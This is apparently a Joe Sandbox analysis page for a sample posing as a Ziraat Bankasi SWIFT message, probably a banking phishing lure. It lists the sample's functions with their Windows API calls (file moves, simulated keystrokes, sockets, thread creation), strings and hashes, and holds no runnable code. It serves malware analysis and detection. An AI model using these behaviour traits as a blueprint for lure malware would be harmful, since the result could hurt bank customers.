Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 2686e756b800986ee6e5a8a0d4ef1bd4dd669f9233c23a32b3ff340806c3b16b
Instruction ID: 5852e062df70c836c5e35a17cb2726c46620db4e31229e6f67c22942c5f6fcbe
Opcode Fuzzy Hash: 2686e756b800986ee6e5a8a0d4ef1bd4dd669f9233c23a32b3ff340806c3b16b
Instruction Fuzzy Hash: 9E517B70604208EFDF20DFA8DC82FAA77F5AB59750F110519F94696AA1D7B0ED80EB90

Function 000C7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8

Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000C5FA6,?), ref: 000C6EF1

Part of subcall function 000C72CB: GetFileAttributesW.KERNEL32(?,000C6019), ref: 000C72CC

lstrcmpiW.KERNEL32(?,?), ref: 000C75CA
_wcscmp.LIBCMT ref: 000C75E2
MoveFileW.KERNEL32(?,?), ref: 000C75FB

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 3500d281b26ad2b8d05d67b0876f3f8b5f2954a61415cdaed0faa0251275812a
Instruction ID: 4b5be11837187696354dba344cd999196662175c8ccbd583e4b7b9b47a39dc1b
Opcode Fuzzy Hash: 3500d281b26ad2b8d05d67b0876f3f8b5f2954a61415cdaed0faa0251275812a
Instruction Fuzzy Hash: 585123B2A092199BDF65EB94D841EDD73BCAF09320F0041AEF609E3542EA7497C5CF64

Function 0009EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 0009EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 0009EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 000FDC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,000FDAD1,00000004,00000000,00000000), ref: 000FDCF2

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: a7972ee54ee7c5bea41a2f4b245c9a5732fb2f0d99a25ce6acf8da7c61551a44
Instruction ID: c94a1d715044fc8eab349ce922bbaceeafb41f0ceb4b4919a7ff37d9e4226028
Opcode Fuzzy Hash: a7972ee54ee7c5bea41a2f4b245c9a5732fb2f0d99a25ce6acf8da7c61551a44
Instruction Fuzzy Hash: 5A41D4702092C5EADFB5CB28D98DA7F7AD7AB41305F19041AE28782D61C7B1BC80F611

Function 000BBFF0 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BD342: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BD362
Part of subcall function 000BD342: GetCurrentThreadId.KERNEL32 ref: 000BD369
Part of subcall function 000BD342: AttachThreadInput.USER32(00000000,?,000BBF3E,?,00000001), ref: 000BD370

MapVirtualKeyW.USER32(00000025,00000000), ref: 000BC010
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000BC02D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 000BC030
MapVirtualKeyW.USER32(00000025,00000000), ref: 000BC039
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000BC057
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000BC05A
MapVirtualKeyW.USER32(00000025,00000000), ref: 000BC063
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000BC07A
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000BC07D

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 5ed280b5b056fdbdfbb3005ef02ea4abacc6b83eec77af0797dd2fbaff254c18
Instruction ID: 064f1192322d8d2202a552740552dafd112166cacb173a03da8e444b94be7111
Opcode Fuzzy Hash: 5ed280b5b056fdbdfbb3005ef02ea4abacc6b83eec77af0797dd2fbaff254c18
Instruction Fuzzy Hash: E31104B1510618BEF7102BB49C89FAA7B2CFB4C754F110416F3806B1E1C9F26C818AA4

Function 000BB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,000BAEF1,00000B00,?,?), ref: 000BB26C
HeapAlloc.KERNEL32(00000000,?,000BAEF1,00000B00,?,?), ref: 000BB273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000BAEF1,00000B00,?,?), ref: 000BB288
GetCurrentProcess.KERNEL32(?,00000000,?,000BAEF1,00000B00,?,?), ref: 000BB290
DuplicateHandle.KERNEL32(00000000,?,000BAEF1,00000B00,?,?), ref: 000BB293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,000BAEF1,00000B00,?,?), ref: 000BB2A3
GetCurrentProcess.KERNEL32(000BAEF1,00000000,?,000BAEF1,00000B00,?,?), ref: 000BB2AB
DuplicateHandle.KERNEL32(00000000,?,000BAEF1,00000B00,?,?), ref: 000BB2AE
CreateThread.KERNEL32(00000000,00000000,000BB2D4,00000000,00000000,00000000), ref: 000BB2C8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 9d59d8a7ae5fcb6b2b5287428e66b84726663fd70f2149326325cdce0b148d82
Instruction ID: 330e3cf502b16dc2c96568f004d90693a5a9ded109a832038ae66970863fe09b
Opcode Fuzzy Hash: 9d59d8a7ae5fcb6b2b5287428e66b84726663fd70f2149326325cdce0b148d82
Instruction Fuzzy Hash: EA01CDB5240304BFE710AFA5EC4DF6B7BACEB88711F018411FA45DF6A1CAB49840CB61

Function 000DBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000DBB5C
VariantInit.OLEAUT32(?), ref: 000DBC2D
VariantInit.OLEAUT32(?), ref: 000DBD2E
VariantClear.OLEAUT32(?), ref: 000DBD38
VariantClear.OLEAUT32(?), ref: 000DBD99

Strings

Incorrect Object type in FOR..IN loop, xrefs: 000DBD11
Null Object assignment in FOR..IN loop, xrefs: 000DBBBD, 000DBCEB, 000DBDA7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: c6e0ad83a22b5f8c95acdd0f872eaedffc7f85d4855f7275eb14e25a51024db2
Instruction ID: 8d9312bfef0a84447ea537582109c8fe387e9feae7018fa4b4b80456064bc429
Opcode Fuzzy Hash: c6e0ad83a22b5f8c95acdd0f872eaedffc7f85d4855f7275eb14e25a51024db2
Instruction Fuzzy Hash: 8F918B71A00319EBDF24DFA5C848FAEBBB9EF85710F11855AF515AB281DB709940CFA0

Function 000C5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 000C58B8

Strings

blank, xrefs: 000C583A
stop, xrefs: 000C5889
warning, xrefs: 000C58A1
info, xrefs: 000C5859
question, xrefs: 000C5871

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: e7db4103854d5e6b243543bc40ec7c2da7ff0abb472f2a286b0b06c76740f1cd
Instruction ID: d436d7a7e306a673a03330f5c49896ebc662443beb749c23ef0f8a9a384519fb
Opcode Fuzzy Hash: e7db4103854d5e6b243543bc40ec7c2da7ff0abb472f2a286b0b06c76740f1cd
Instruction Fuzzy Hash: 7711EB79309B46BEE7115B949C82EAE23DC9F15364F20003EF554F56C2EBA0BA844268

Function 000CA74E Relevance: 12.3, APIs: 8, Instructions: 304COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 000CA806
SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA831
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 000CA858
SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA895
SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA9C2
SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA93B

Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533

SafeArrayUnaccessData.OLEAUT32(?), ref: 000CAAB7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ArraySafe$Data$Access$Unaccess$Exception@8ThrowVartypestd::exception::exception
String ID:
API String ID: 3434581110-0
Opcode ID: d627a66dcd6233e10c0ace1798d73a12772d3dd4cfd2259e3164c41c64283cd0
Instruction ID: 30ddcb224817115832cbe4b0858f31e83680293cd598c127333a8bb7406efc2a
Opcode Fuzzy Hash: d627a66dcd6233e10c0ace1798d73a12772d3dd4cfd2259e3164c41c64283cd0
Instruction Fuzzy Hash: C1C15975A0520A9FDB10CF94D481BEEB7F0FF0A319F20406EE606E7251D735AA41CBA2

Function 000C6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100), ref: 000C6B63
LoadStringW.USER32(00000000), ref: 000C6B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000C6B80
LoadStringW.USER32(00000000), ref: 000C6B87
_wprintf.LIBCMT ref: 000C6BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C6BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 000C6BA8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 5dd68de1bd534f153f6220952efb35facc5a57da457429b5de657adbd7c1efef
Instruction ID: 6bf6e79843775a680bd5f5248f4865637b04d680648787527865a2b68ceddafa
Opcode Fuzzy Hash: 5dd68de1bd534f153f6220952efb35facc5a57da457429b5de657adbd7c1efef
Instruction Fuzzy Hash: 270112F65002187FE711A7D4AD89EEA766CD704304F0044A5B785E2441EAB49EC48B75

Function 000D95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 000D9691
WSAGetLastError.WSOCK32(00000000), ref: 000D969E
__WSAFDIsSet.WSOCK32(00000000,?), ref: 000D96C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000D96E9
WSAGetLastError.WSOCK32(00000000), ref: 000D96F8
htons.WSOCK32(?), ref: 000D97AA
inet_ntoa.WSOCK32(?), ref: 000D9765

Part of subcall function 000BD2FF: _strlen.LIBCMT ref: 000BD309

_strlen.LIBCMT ref: 000D9800

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: 1df10696c32ea52b2ec0a8424a23b09a69b1b7f06537d85151d7aa112eb1fbc8
Instruction ID: 47fe04adc7a4d0d20655ea00b048f285f41a87b93038b385fc231abacc84ebcc
Opcode Fuzzy Hash: 1df10696c32ea52b2ec0a8424a23b09a69b1b7f06537d85151d7aa112eb1fbc8
Instruction Fuzzy Hash: E181CC31504340ABD710EF64DC85EAFB7E8EF85714F104A2EF5959B292EB70D904CBA2

Function 000AA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 000AA991

Part of subcall function 000A7D7C: __FF_MSGBANNER.LIBCMT ref: 000A7D91
Part of subcall function 000A7D7C: __NMSG_WRITE.LIBCMT ref: 000A7D98
Part of subcall function 000A7D7C: __malloc_crt.LIBCMT ref: 000A7DB8

__lock.LIBCMT ref: 000AA9A4
__lock.LIBCMT ref: 000AA9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00136DE0,00000018,000B5E7B,?,00000000,00000109), ref: 000AAA0C
EnterCriticalSection.KERNEL32(8000000C,00136DE0,00000018,000B5E7B,?,00000000,00000109), ref: 000AAA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 000AAA39

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 4ab0bb5aa6044aece5cc2e23630427d444e468156d8f1432cfe6623209351f21
Instruction ID: a2bb79dc31a36648c761484ad8953c3f89c05f0b2a81357ba2408b57d9dba925
Opcode Fuzzy Hash: 4ab0bb5aa6044aece5cc2e23630427d444e468156d8f1432cfe6623209351f21
Instruction Fuzzy Hash: B4412871B006019BEB249FE8D94479DB7F0AF17334F158329E529AB2E2D7B49840CB92

Function 000E8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 000E8EE4
GetDC.USER32(00000000), ref: 000E8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000E8EF7
ReleaseDC.USER32(00000000,00000000), ref: 000E8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 000E8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000E8F50
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000E8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000E8FAA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 86ca28c53c9ab773a8f1badf7badfa4352b8725a0d7116e9af72283808fbf110
Instruction ID: 95e6cc09143e983f65c993395355b7cbf7e309825eda83ea78b8efb9ce759c38
Opcode Fuzzy Hash: 86ca28c53c9ab773a8f1badf7badfa4352b8725a0d7116e9af72283808fbf110
Instruction Fuzzy Hash: 16317F72100254BFEB108F95DC49FEB3BADEF49715F044065FE48AA191DAB59881CB70

Function 000DB644 Relevance: 10.9, APIs: 7, Instructions: 399COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0011DC00), ref: 000DB715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0011DC00), ref: 000DB749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 000DB8C1
SysFreeString.OLEAUT32(?), ref: 000DB8EB

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 9f263ebeb952f263da7a8b3cc101c50990625cb2a78cd848384139b51ae8f71f
Instruction ID: b132f78d06e59b199a63e3bf86218fd317d1b02ba9c1b125453fe08381d132d2
Opcode Fuzzy Hash: 9f263ebeb952f263da7a8b3cc101c50990625cb2a78cd848384139b51ae8f71f
Instruction Fuzzy Hash: E6E16B75A00209EFCF14DF94C888EAEB7B9FF89311F118459F905AB250DB71AE41CBA0

Function 000D16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717

_wcstok.LIBCMT ref: 000D184E
_wcscpy.LIBCMT ref: 000D18DD
_memset.LIBCMT ref: 000D1910

Strings

X, xrefs: 000D1948

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: dce497cf19ceda9c58ffb17e7246af9d71a96966ad1508c14ac42e46ae890dc6
Instruction ID: 17b3bd4220588dd7790f8fce5878be8fae9549a886193f5d6d90f53910abbf79
Opcode Fuzzy Hash: dce497cf19ceda9c58ffb17e7246af9d71a96966ad1508c14ac42e46ae890dc6
Instruction Fuzzy Hash: AFC17D31508340AFC764EF64C895ADAB7E4BF95350F04492EF89A973A2DB30ED05CB92

Function 000F0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

GetSystemMetrics.USER32(0000000F), ref: 000F016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 000F038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 000F03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 000F03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 000F03FF
ShowWindow.USER32(00000003,00000000), ref: 000F0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 000F0440

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 63a2589c90bc97d29b354cde6b28641df6d07cb1ccf9d2f26abc8d4a1850f33a
Instruction ID: 7454fc281396f2abbe0f6b603fdaa501b62ca40809db57c423b28870b6041036
Opcode Fuzzy Hash: 63a2589c90bc97d29b354cde6b28641df6d07cb1ccf9d2f26abc8d4a1850f33a
Instruction Fuzzy Hash: 31A1103560061AEFDB18CF68C9857BDBBF5BF48700F048115EE54A7692D770AE90EB90

Function 0009AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1827f71a050a52bc20fd0b9ecf0440b7307a1477b108c3e8388b496c90b30c1c
Instruction ID: 59ae8f9f0179c5818ef3602da588a226d822e1788b07422a05611681af6150ed
